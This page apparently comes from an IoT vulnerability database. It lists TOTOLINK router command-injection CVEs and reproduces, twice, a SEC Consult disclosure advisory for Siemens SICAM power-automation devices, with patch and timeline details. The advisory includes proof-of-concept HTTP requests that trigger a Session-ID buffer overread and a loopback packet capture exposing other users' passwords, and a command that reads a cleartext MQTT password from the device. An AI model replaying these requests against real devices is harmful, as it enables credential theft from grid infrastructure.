VARIoT IoT vulnerabilities database
| VAR-202405-0963 | CVE-2024-32353 | TOTOLINK X5000R firmware command injection vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain a command injection vulnerability via the 'port' parameter in the setSSServer function at /cgi-bin/cstecgi.cgi. The TOTOLINK X5000R firmware contains a command injection vulnerability: information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). TOTOLINK X5000R is a router made by China's TOTOLINK Electronics. Attackers can exploit this vulnerability to execute arbitrary commands.
| VAR-202405-1423 | CVE-2024-32352 | TOTOLINK X5000R firmware code injection vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "ipsecL2tpEnable" parameter in the "cstecgi.cgi" binary. The TOTOLINK X5000R firmware contains a code injection vulnerability: information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). TOTOLINK X5000R is a router made by China's TOTOLINK Electronics. The vulnerability is caused by the ipsecL2tpEnable parameter of cstecgi.cgi failing to properly filter special elements in a constructed code segment. An attacker can exploit this vulnerability to execute arbitrary code.
| VAR-202405-1577 | CVE-2024-32351 | TOTOLINK X5000R firmware OS command injection vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "mru" parameter in the "cstecgi.cgi" binary. The TOTOLINK X5000R firmware contains an OS command injection vulnerability: information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). TOTOLINK X5000R is a router made by China's TOTOLINK Electronics. The code execution vulnerability is caused by the mru parameter of cstecgi.cgi failing to properly filter special elements in a constructed code segment. Attackers can exploit this vulnerability to execute arbitrary code.
| VAR-202405-0384 | CVE-2024-32350 | TOTOLINK X5000R firmware code injection vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "ipsecPsk" parameter in the "cstecgi.cgi" binary. The TOTOLINK X5000R firmware contains a code injection vulnerability: information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). TOTOLINK X5000R is a router made by China's TOTOLINK Electronics. The code execution vulnerability is caused by the ipsecPsk parameter of cstecgi.cgi failing to properly filter special elements in a constructed code segment. Attackers can exploit this vulnerability to execute arbitrary code.
| VAR-202405-0812 | CVE-2024-32349 | TOTOLINK X5000R firmware command injection vulnerability |
CVSS V2: 5.9 CVSS V3: 6.0 Severity: MEDIUM |
TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "mtu" parameter in the "cstecgi.cgi" binary. The TOTOLINK X5000R firmware contains a command injection vulnerability: information may be obtained and information may be tampered with. TOTOLINK X5000R is a router made by China's TOTOLINK Electronics. The vulnerability is caused by the mtu parameter of cstecgi.cgi failing to properly filter special elements in a constructed code segment. An attacker can exploit this vulnerability to execute arbitrary code.
| VAR-202405-0175 | CVE-2024-31486 | Siemens SICAM product sensitive information plaintext storage vulnerability |
CVSS V2: 4.9 CVSS V3: 5.3 Severity: Medium |
A vulnerability has been identified in OPUPI0 AMQP/MQTT (All versions < V5.30). The affected devices store MQTT client passwords without sufficient protection on the devices. An attacker with remote shell access or physical access could retrieve the credentials, leading to confidentiality loss. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the power supply sector. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks.
Siemens SICAM products have a sensitive information plaintext storage vulnerability.
SEC Consult Vulnerability Lab Security Advisory < 20240626-0 >
=======================================================================
title: Multiple Vulnerabilities in Power Automation Products
product: Siemens CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/SICORE
vulnerable version: CPC80 < V16.41 / CPCI85 < V5.30 / OPUPI0 < V5.30 / SICORE < V1.3.0 /
CPCX26 < V06.02 for CP-2016 and PCCX26 < V06.05 for CP-2019 in SICAM AK3 /
ETA4 < V10.46 and ETA5 < V03.27 for SM-2558 in SICAM AK3, SICAM BC and SICAM TM
fixed version: CPC80 V16.41 / CPCI85 V5.30 / OPUPI0 V5.30 / SICORE V1.3.0 / CPCX26 V06.02 /
PCCX26 V06.05 / ETA4 V10.46 / ETA5 V03.27
CVE number: CVE-2024-31484, CVE-2024-31485, CVE-2024-31486
impact: high
homepage: https://www.siemens.com/global/en/products/energy/energy-automation-and-smart-grid.html
found: 2023-04-03 and 2024-01-12
by: Stefan Viehboeck (Office Vienna)
Steffen Robertz (Office Vienna)
Gerhard Hechenberger (Office Vienna)
Constantin Schieber-Knoebl (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"We are a technology company focused on industry, infrastructure,
transport, and healthcare. From more resource-efficient factories,
resilient supply chains, and smarter buildings and grids, to cleaner
and more comfortable transportation as well as advanced healthcare,
we create technology with purpose adding real value for customers."
Source: https://new.siemens.com/global/en/company/about.html
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends performing a thorough security review of the product,
conducted by security professionals, to identify and resolve potential further
security issues.
Vulnerability overview/description:
-----------------------------------
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)
The webserver running on the CP-8050 and CP-8031 is vulnerable to a buffer overread
vulnerability.
The value of the HTTP header "Session-ID" is processed and used in a "strncpy" call
without proper termination. Thus, data structures from the BSS segment will be
leaked in the response. Attackers might be able to read sensitive data from memory.
2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)
An attacker with an account with the viewer (or higher) role can intercept unencrypted
traffic of other users of the web interface. Thus, the attacker can intercept higher
privileged user accounts and passwords and might gain access to their accounts to
perform tasks with elevated privileges.
3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486)
A PLC with the OPUPI0 MQTT application installed is able to connect to
an MQTT server. The configured MQTT password for the server is stored
in cleartext on the device and can be read by exploiting a potential
code execution or file disclosure vulnerability or with physical access
to the device.
Proof of concept:
-----------------
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)
The buffer overread can be triggered by sending a "Session-ID" in the HTTP request header
with exactly 20 bytes. This can be done with e.g. this request:
POST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1
User-Agent: SICAM TOOLBOX II
Version: 1
Session-ID: 3814280BA9921c6cAAAA
Sequence-ID: 1
Content-Length: 8
Content-Type: text/plain
KeepAlive: 5
Connection: close
type=3
The server answers with the following response:
HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA9921c6cAAAAæk¤
Cache-Control: max-age=0, private
X-Frame-Options: sameorigin
Strict-Transport-Security: max-age=31536000; includeSubdomains
Content-Security-Policy: default-src 'self' data: blob: 'unsafe-inline' 'unsafe-eval'
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
Content-Length: 71
Connection: close
Date: Wed, 30 Mar 2022 01:38:37 GMT
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8
type=4
The Session-ID in the response leaks at least 4 additional bytes. Further,
the structure of the response is broken, as some HTTP headers are suddenly part
of the body.
The vulnerability most likely stems from a misuse of the strncpy function.
The following code segment was analyzed (RTUM85.elf, Offset 0x1d50de):
ptr_fcgi_header = get_fcgi_param(fcgi_struct, "HTTP_SESSION_ID");
if (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66;
if ( is_a_session_available == 0 ) {
    /* 0x14 == 20 bytes: a 20-byte header fills the buffer with no room for a NUL terminator */
    strncpy(&session_id, ptr_fcgi_header, 0x14);
}
strncpy is called with a length parameter of 0x14 (20). To trigger the vulnerability,
we send exactly 0x14 bytes. Thus, we believe that the global session_id
variable is never properly terminated with a NUL byte.
libc's documentation even contains a warning for this case:
"If there is no null byte among the first n bytes of src, the string
placed in dest will not be null-terminated."
Thus, when the response is built, every data structure in BSS following the
session_id global is printed as part of the string until a NUL byte is encountered.
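The non-terminated strncpy pattern above, reduced to a self-contained C model. This is an added example, not code from the advisory or from the Siemens firmware: a 20-byte session_id buffer is followed directly by another global (a constructed stand-in, since the advisory does not say what actually follows session_id in .bss), the vulnerable copy uses n == sizeof(dest) exactly as the decompiled snippet does, and a hardened variant rejects overlong headers and terminates explicitly. echoed_session_bytes models a response builder that reads from session_id until the first NUL, so its return value shows how many bytes beyond the 20-byte id would be echoed back into the Session-ID response header. All names, the struct layout and the "SECRET_NEIGHBOUR" content are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define SESSION_ID_LEN 0x14   /* the 20-byte length passed to strncpy in the advisory */

/* Constructed stand-in for the firmware's BSS layout: the session id buffer is
 * followed directly by another global. The real neighbouring data is not known
 * from the advisory; "SECRET_NEIGHBOUR" is made up for this demo. */
struct bss_like {
    char session_id[SESSION_ID_LEN];
    char neighbour[24];
};

static void init_globals(struct bss_like *g) {
    memset(g, 0, sizeof *g);
    strcpy(g->neighbour, "SECRET_NEIGHBOUR");   /* 16 bytes + NUL */
}

/* Vulnerable pattern from the advisory: n == sizeof(dest). When the header is
 * 20 bytes or longer no NUL is written, so session_id is not a C string. */
static void copy_session_id_vulnerable(struct bss_like *g, const char *hdr) {
    strncpy(g->session_id, hdr, SESSION_ID_LEN);
}

/* Hardened variant: reject overlong input, copy at most n-1 bytes and
 * terminate explicitly. Returns 0 on success, -1 if the header is rejected. */
static int copy_session_id_fixed(struct bss_like *g, const char *hdr) {
    if (strlen(hdr) >= SESSION_ID_LEN) return -1;
    strncpy(g->session_id, hdr, SESSION_ID_LEN - 1);
    g->session_id[SESSION_ID_LEN - 1] = '\0';
    return 0;
}

/* Models the response builder: count bytes starting at session_id until the
 * first NUL. Scanning the struct's own bytes as unsigned char stays inside
 * the object, so the model is well-defined; the count is what would be
 * echoed into the Session-ID response header. */
static size_t echoed_session_bytes(const struct bss_like *g) {
    const unsigned char *p = (const unsigned char *)g;
    size_t n = 0;
    while (n < sizeof *g && p[n] != '\0') n++;
    return n;
}

/* Bytes echoed for a given header with the vulnerable copy. */
size_t echoed_vulnerable(const char *hdr) {
    struct bss_like g;
    init_globals(&g);
    copy_session_id_vulnerable(&g, hdr);
    return echoed_session_bytes(&g);
}

/* Bytes echoed with the hardened copy; (size_t)-1 if the header was rejected. */
size_t echoed_fixed(const char *hdr) {
    struct bss_like g;
    init_globals(&g);
    if (copy_session_id_fixed(&g, hdr) != 0) return (size_t)-1;
    return echoed_session_bytes(&g);
}

int main(void) {
    const char *normal = "3814280BA9921c6c";      /* 16 bytes: fits, terminator intact */
    const char *twenty = "3814280BA9921c6cAAAA";  /* exactly 0x14 bytes, as in the PoC */
    printf("vulnerable copy, 16-byte id: %zu bytes echoed\n", echoed_vulnerable(normal));
    printf("vulnerable copy, 20-byte id: %zu bytes echoed (20 id + neighbour leak)\n",
           echoed_vulnerable(twenty));
    printf("hardened copy, 20-byte id: %s\n",
           echoed_fixed(twenty) == (size_t)-1 ? "rejected" : "accepted");
    return 0;
}
```

With a 16-byte id both variants echo 16 bytes; with the 20-byte id the vulnerable copy echoes 36 bytes (the id plus the whole neighbouring global), which is the same shape of leak the PoC response shows. The fix is the usual one for this class of bug: reserve one byte for the terminator and write it unconditionally, and treat an input that would fill the buffer as an error rather than silently truncating.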
2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)
An attacker with an account with the viewer (or higher) role can intercept unencrypted
traffic of other users of the web interface. Thus, the attacker can intercept higher
privileged user accounts and passwords.
By starting the Ethernet Packet Capture (Home -> Monitoring & Simulation -> Ethernet
Packet Capture), a request is sent. This request can be modified by an interceptor
proxy (e.g. Burp Suite).
POST /sicweb-ajax/rtum85/cview HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml
SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT
Content-Length: 198
Origin: http:// HOST
Connection: close
Referer: http:// HOST/
<?xml version="1.0" encoding="UTF-8"?>
<Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0">
<value>lo</value>
</parameter></view></Cmd_SetCustomViewValue>
The attacker can then set the parameter p0 to the value "lo" and start the
packet capture in order to dump traffic from the loopback interface. It is accepted
as a valid interface name, as it consists only of lowercase characters and numbers
(the fix for CVE-2023-33919).
However, the webserver implements TLS in a stunnel fashion. It accepts all
TLS traffic on port 443, then decrypts it and forwards it via loopback interface
to port 80. By being able to read the loopback traffic, an attacker can now
see all communication, including passwords of higher privileged users.
3) Unsafe Storage of MQTT Passwords (Only CP-8031/CP-8050, CVE-2024-31486)
To demonstrate the issue, the following parameters were set for the MQTT client
using the Siemens Toolbox II:
* "8 MQTT password" mqtt_pw_sectest
* "9 MQTT username" mqtt_sectest
The password (together with the username) can be located in the
/ies/data/local/system/iescfg.iar file on the device, which can be
retrieved by shell access/code execution on the device or by desoldering
and reading its unencrypted flash memory chip:
-----------------------------------------------------------------------
grep -rain "mqtt_pw_sectest" /ies/data/local/system/iescfg.iar
[...]
mqtt
mqtt_sectest.
mqtt_pw_sectest.
< �MQTT_Broker
[...]
-----------------------------------------------------------------------
Vulnerable / tested versions:
-----------------------------
The following versions were tested, which were the latest versions available
at the time of the test:
Vulnerabilities 1 and 2 were confirmed on Siemens SICAM A8000 CP-8031 V05.12
Vulnerability 3 was confirmed on Siemens A8000 CP-8050 V04.92
Vendor contact timeline:
------------------------
2023-04-18: Contacting vendor through productcert@siemens.com for vulnerability 3
2023-04-19: Advisory will be handled as case #92461.
2023-06-13: Siemens releases advisory for other vulnerabilities, see https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-siemens-a8000/
2023-10-09: Requesting status update
2024-04-03: Requesting status update.
2024-04-04: Unsafe Storage of MQTT password: fix will be released in April 2024,
Siemens advisory scheduled for May 2024
2024-04-11: Contacting vendor through productcert@siemens.com for Vulnerability 1 and 2
2024-04-12: Siemens assigned case #68662 for Vulnerability 1,2
2024-05-14: Siemens publishes SSA-871704 for vulnerability 1,2,3
2024-06-11: Siemens publishes SSA-620338 for Vulnerability 1
2024-06-26: Public release of advisory
Solution:
---------
The vendor provides a patch which can be downloaded at the following URLs
depending on the affected device:
CPC80 Central Processing/Communication: The firmware CPC80 V16.41 is present within “CP-8000/CP-8021/CP-8022 Package” V16.41
https://support.industry.siemens.com/cs/ww/en/view/109812178/
CPCI85 Central Processing/Communication: The firmware CPCI85 V5.30 is present within "CP-8031/CP-8050 Package" V5.30
https://support.industry.siemens.com/cs/ww/en/view/109804985/
SICORE Base system: The firmware SICORE V1.3.0 is present within "SICAM 8 Software Solution Package" V5.30
https://support.industry.siemens.com/cs/ww/en/view/109818240/
OPUPI0 AMQP/MQTT: The firmware OPUPI0 V5.30 is present within "CP-8031/CP-8050 Package" V5.30
https://support.industry.siemens.com/cs/ww/en/view/109804985/
CPCX26 Central Processing/Communication: The firmware CPCX26 V06.02 is present within “SICAM RTUs AK3 Package” V06.02
https://support.industry.siemens.com/cs/ww/en/view/109813252/
PCCX26 Ax 1703 PE, Contr, Communication Element: The firmware PCCX26 V06.05 is present within “SICAM RTUs AK3 Package” V06.02
https://support.industry.siemens.com/cs/ww/en/view/109813252/
ETA4 Ethernet Interface IEC60870-5-104: The firmware ETA4 V10.46 is present within “SICAM RTUs AK3 Package” V06.02
https://support.industry.siemens.com/cs/ww/en/view/109813252/
ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: The firmware ETA5 V03.27 is present within “SICAM RTUs AK3 Package” V06.02
https://support.industry.siemens.com/cs/ww/en/view/109813252/
Additional information from the vendor can be found in their advisories:
https://cert-portal.siemens.com/productcert/html/ssa-871704.html
https://cert-portal.siemens.com/productcert/html/ssa-620338.html
Workaround:
-----------
Limit network and physical access to the PLC.
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Stefan Viehboeck, Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knoebl / @2024
| VAR-202405-0176 | CVE-2024-31485 | Siemens SICAM Product Command Injection Vulnerability |
CVSS V2: 8.3 CVSS V3: 7.2 Severity: High |
A vulnerability has been identified in CPCI85 Central Processing/Communication (All versions < V5.30), SICORE Base system (All versions < V1.3.0). The web interface of affected devices is vulnerable to command injection due to missing server side input sanitation. This could allow an authenticated privileged remote attacker to execute arbitrary code with root privileges. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the power supply sector. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. The SEC Consult advisory 20240626-0 covering this issue is reproduced in full under the CVE-2024-31486 entry above.
| VAR-202405-0174 | CVE-2024-31484 | Siemens SICAM products have unspecified vulnerabilities |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: High |
A vulnerability has been identified in CPC80 Central Processing/Communication (All versions < V16.41), CPCI85 Central Processing/Communication (All versions < V5.30), CPCX26 Central Processing/Communication (All versions < V06.02), ETA4 Ethernet Interface IEC60870-5-104 (All versions < V10.46), ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2 (All versions < V03.27), PCCX26 Ax 1703 PE, Contr, Communication Element (All versions < V06.05). The affected devices contain an improper null termination vulnerability while parsing a specific HTTP header. This could allow an attacker to execute code in the context of the current process or lead to denial of service condition. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the field of power supply. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. SEC Consult Vulnerability Lab Security Advisory < 20240626-0 >
=======================================================================
title: Multiple Vulnerabilities in Power Automation Products
product: Siemens CP-8000/CP-8021/CP8-022/CP-8031/CP-8050/SICORE
vulnerable version: CPC80 < V16.41 / CPCI85 < V5.30 / OPUPI0 < V5.30 / SICORE < V1.3.0 /
CPCX26 < V06.02 for CP-2016 and PCCX26 < V06.05 for CP-2019 in SICAM AK3 /
ETA4 < V10.46 and ETA5 < V03.27 for SM-2558 ins SICAM AK3, SICAM BC and SICAM TM
fixed version: CPC80 V16.41 / CPCI85 V5.30 / OPUPI V5.30 / SICORE V1.3.0 / CPCX26 V06.02 /
PCCX26 V06.05 / ETA4 V10.46 / ETA5 V03.27
CVE number: CVE-2024-31484, CVE-2024-31485, CVE-2024-31486
impact: high
homepage: https://www.siemens.com/global/en/products/energy/energy-automation-and-smart-grid.html
found: 2023-04-03 and 2024-01-12
by: Stefan Viehboeck (Office Vienna)
Steffen Robertz (Office Vienna)
Gerhard Hechenberger (Office Vienna)
Constantin Schieber-Knoebl (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"We are a technology company focused on industry, infrastructure,
transport, and healthcare. From more resource-efficient factories,
resilient supply chains, and smarter buildings and grids, to cleaner
and more comfortable transportation as well as advanced healthcare,
we create technology with purpose adding real value for customers."
Source: https://new.siemens.com/global/en/company/about.html
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends performing a thorough security review of the product,
conducted by security professionals, to identify and resolve further potential
security issues.
Vulnerability overview/description:
-----------------------------------
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)
The webserver running on the CP-8050 and CP-8031 contains a buffer overread
vulnerability.
The value of the HTTP header "Session-ID" is processed and used in a "strncpy" call
without proper null termination. Thus, data structures from the BSS segment are
leaked in the response. Attackers might be able to read sensitive data from memory.
2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)
An attacker with an account with the viewer (or higher) role can intercept unencrypted
traffic of other users of the web interface. Thus, the attacker can intercept higher
privileged user accounts and passwords and might gain access to their accounts to
perform tasks with elevated privileges.
3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486)
A PLC with the OPUPI0 MQTT application installed is able to connect to
an MQTT server. The configured MQTT password for the server is stored
in cleartext on the device and can be read by exploiting a potential
code execution or file disclosure vulnerability or with physical access
to the device.
Proof of concept:
-----------------
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)
The buffer overread can be triggered by sending a "Session-ID" in the HTTP request header
with exactly 20 bytes. This can be done with e.g. this request:
POST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1
User-Agent: SICAM TOOLBOX II
Version: 1
Session-ID: 3814280BA9921c6cAAAA
Sequence-ID: 1
Content-Length: 8
Content-Type: text/plain
KeepAlive: 5
Connection: close
type=3
The server answers with following response:
HTTP/1.1 200 OK
Server: SICAM 1703
Version: 1
Session-ID: 3814280BA9921c6cAAAAæk¤
Cache-Control: max-age=0, private
X-Frame-Options: sameorigin
Strict-Transport-Security: max-age=31536000; includeSubdomains
Content-Security-Policy: default-src 'self' data: blob: 'unsafe-inline' 'unsafe-eval'
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
Content-Length: 71
Connection: close
Date: Wed, 30 Mar 2022 01:38:37 GMT
Sequence-ID: 1
Content-Type: text/plain
Content-Length: 8
type=4
The Session-ID in the response leaks at least 4 additional bytes. Further,
the structure of the response is broken, as some HTTP headers are suddenly part
of the body.
The vulnerability most likely stems from a misuse of the strncpy function.
The following code segment was analyzed (RTUM85.elf, Offset 0x1d50de):
ptr_fcgi_header = get_fcgi_param(fcgi_struct, "HTTP_SESSION_ID");
if (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66;
if ( is_a_session_available == 0 ) {
    strncpy(&session_id, ptr_fcgi_header, 0x14);
}
strncpy is called with a length parameter of 0x14. To trigger the vulnerability,
we are sending exactly 0x14 bytes. Thus, we believe that the global session_id
variable is never properly terminated with a Null-pointer.
libc's documentation even contains a warning for this case:
"If there is no null byte among the first n bytes of src, the string
placed in dest will not be null-terminated."
Thus, when the response is built, every data structure in BSS following the
session_id global is printed as a string until a null byte is encountered.
2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)
An attacker with an account with the viewer (or higher) role can intercept unencrypted
traffic of other users of the web interface. Thus, the attacker can intercept higher
privileged user accounts and passwords.
By starting the Ethernet Packet Capture (Home -> Monitoring & Simulation -> Ethernet
Packet Capture), a request is sent. This request can be modified by an interceptor
proxy (e.g. Burp Suite).
POST /sicweb-ajax/rtum85/cview HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml
SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT
Content-Length: 198
Origin: http:// HOST
Connection: close
Referer: http:// HOST/
<?xml version="1.0" encoding="UTF-8"?>
<Cmd_SetCustomViewValue><view id="packet_capture"><parameter id="p0">
<value>lo</value>
</parameter></view></Cmd_SetCustomViewValue>
The attacker can then set the parameter id p0 to the value "lo" and start the
packet capture in order to dump traffic from the loopback interface. It is accepted
as a valid interface name, as it consists only of lowercase characters and numbers
(the fix for CVE-2023-33919).
However, the webserver implements TLS in a stunnel fashion. It accepts all
TLS traffic on port 443, then decrypts it and forwards it via loopback interface
to port 80. By being able to read the loopback traffic, an attacker can now
see all communication, including passwords of higher privileged users.
3) Unsafe Storage of MQTT Passwords (Only CP-8031/CP-8050, CVE-2024-31486)
To demonstrate the issue, the following parameters were set for the MQTT client
using the Siemens Toolbox II:
* "8 MQTT password" mqtt_pw_sectest
* "9 MQTT username" mqtt_sectest
The password (together with the username) can be located in the
/ies/data/local/system/iescfg.iar file on the device, which can be
retrieved by shell access/code execution on the device or by desoldering
and reading its unencrypted flash memory chip:
-----------------------------------------------------------------------
grep -rain "mqtt_pw_sectest" /ies/data/local/system/iescfg.iar
[...]
mqtt
mqtt_sectest.
mqtt_pw_sectest.
< �MQTT_Broker
[...]
-----------------------------------------------------------------------
Vulnerable / tested versions:
-----------------------------
The following versions have been tested, which were the latest versions available
at the time of the test:
Vulnerability 1 and 2 were confirmed on Siemens SICAM A8000 CP-8031 V05.12
Vulnerability 3 was confirmed on Siemens A8000 CP-8050 V04.92
Vendor contact timeline:
------------------------
2023-04-18: Contacting vendor through productcert@siemens.com for vulnerability 3
2023-04-19: Advisory will be handled as case #92461.
2023-06-13: Siemens releases advisory for other vulnerabilities, see https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-siemens-a8000/
2023-10-09: Requesting status update
2024-04-03: Requesting status update.
2024-04-04: Unsafe Storage of MQTT password: fix will be released in April 2024,
Siemens advisory scheduled for May 2024
2024-04-11: Contacting vendor through productcert@siemens.com for Vulnerability 1 and 2
2024-04-12: Siemens assigned case #68662 for Vulnerability 1,2
2024-05-14: Siemens publishes SSA-871704 for vulnerability 1,2,3
2024-06-11: Siemens publishes SSA-620338 for Vulnerability 1
2024-06-26: Public release of advisory
Solution:
---------
The vendor provides a patch which can be downloaded at the following URLs
depending on the affected device:
CPC80 Central Processing/Communication: The firmware CPC80 V16.41 is present within "CP-8000/CP-8021/CP-8022 Package" V16.41
https://support.industry.siemens.com/cs/ww/en/view/109812178/
CPCI85 Central Processing/Communication: The firmware CPCI85 V5.30 is present within "CP-8031/CP-8050 Package" V5.30
https://support.industry.siemens.com/cs/ww/en/view/109804985/
SICORE Base system: The firmware SICORE V1.3.0 is present within "SICAM 8 Software Solution Package" V5.30
https://support.industry.siemens.com/cs/ww/en/view/109818240/
OPUPI0 AMQP/MQTT: The firmware OPUPI0 V5.30 is present within "CP-8031/CP-8050 Package" V5.30
https://support.industry.siemens.com/cs/ww/en/view/109804985/
CPCX26 Central Processing/Communication: The firmware CPCX26 V06.02 is present within "SICAM RTUs AK3 Package" V06.02
https://support.industry.siemens.com/cs/ww/en/view/109813252/
PCCX26 Ax 1703 PE, Contr, Communication Element: The firmware PCCX26 V06.05 is present within "SICAM RTUs AK3 Package" V06.02
https://support.industry.siemens.com/cs/ww/en/view/109813252/
ETA4 Ethernet Interface IEC60870-5-104: The firmware ETA4 V10.46 is present within "SICAM RTUs AK3 Package" V06.02
https://support.industry.siemens.com/cs/ww/en/view/109813252/
ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: The firmware ETA5 V03.27 is present within "SICAM RTUs AK3 Package" V06.02
https://support.industry.siemens.com/cs/ww/en/view/109813252/
Additional information from the vendor can be found in their advisories:
https://cert-portal.siemens.com/productcert/html/ssa-871704.html
https://cert-portal.siemens.com/productcert/html/ssa-620338.html
Workaround:
-----------
Limit network and physical access to the PLC.
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
